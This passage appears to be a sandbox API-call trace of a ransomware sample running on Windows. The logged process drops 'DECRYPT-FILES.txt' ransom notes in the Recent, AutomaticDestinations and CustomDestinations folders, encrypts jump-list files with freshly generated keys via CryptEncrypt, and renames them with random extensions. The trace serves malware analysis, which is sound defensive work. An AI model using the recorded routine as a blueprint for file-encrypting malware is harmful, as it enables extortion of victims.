ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0088.155] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0088.155] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0088.156] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0088.156] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0088.156] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\jkbimi8.tmp") returned 70 [0088.156] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.157] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 58 [0088.157] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.157] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt") returned 76 [0088.157] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.159] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.160] CloseHandle (hObject=0x444) returned 1 [0088.160] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 58 [0088.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0088.160] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.160] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.160] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.160] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x125b3d0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0088.160] lstrcmpW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0088.160] lstrcmpW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0088.160] lstrcatW (in: lpString1="AutomaticDestinations", lpString2="\\" | out: lpString1="AutomaticDestinations\\") returned="AutomaticDestinations\\" [0088.160] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="AutomaticDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0088.160] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\jkbimi8.tmp") returned 92 [0088.160] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.161] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0088.161] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.161] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt") returned 98 [0088.161] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.166] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.167] CloseHandle (hObject=0x44c) returned 1 [0088.167] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0088.167] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0088.167] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.168] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.168] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.168] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.168] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x14bb620, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0088.168] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0088.168] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="1b4dd67f29cb1962.automaticDestinations-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" [0088.168] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.168] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0088.169] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=5632) returned 1 [0088.169] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0088.169] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.170] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.170] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.170] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.172] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0088.172] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.173] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.173] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.174] CloseHandle (hObject=0x454) returned 1 [0088.174] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.174] WriteFile (in: hFile=0x450, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0088.175] CloseHandle (hObject=0x0) returned 0 [0088.175] CloseHandle (hObject=0x450) returned 1 [0088.175] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.175] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.175] GetTickCount () returned 0x114e7c0 [0088.175] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.176] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.176] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.176] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.176] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.176] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms") returned 121 [0088.177] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX") returned 128 [0088.177] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.r5eqsx"), dwFlags=0x0) returned 1 [0088.177] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.177] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.178] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.178] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.178] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0088.178] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp" [0088.178] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.178] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.178] CloseHandle (hObject=0x0) returned 0 [0088.178] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.179] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.179] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.179] CloseHandle (hObject=0x448) returned 1 [0088.179] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0088.179] lstrcmpW (lpString1="CustomDestinations", lpString2=".") returned 1 [0088.179] lstrcmpW (lpString1="CustomDestinations", lpString2="..") returned 1 [0088.179] lstrcatW (in: lpString1="CustomDestinations", lpString2="\\" | out: lpString1="CustomDestinations\\") returned="CustomDestinations\\" [0088.179] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0088.179] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\jkbimi8.tmp") returned 89 [0088.179] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.181] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0088.181] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.181] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt") returned 95 [0088.181] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.182] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.183] CloseHandle (hObject=0x44c) returned 1 [0088.183] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0088.183] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0088.183] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.183] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.183] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0088.183] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0088.183] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="1b4dd67f29cb1962.customDestinations-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" [0088.183] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.183] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0088.184] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=24) returned 1 [0088.184] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0088.184] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.184] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.184] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.184] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.186] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0088.186] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.186] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.186] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.187] CloseHandle (hObject=0x454) returned 1 [0088.187] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.187] WriteFile (in: hFile=0x450, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 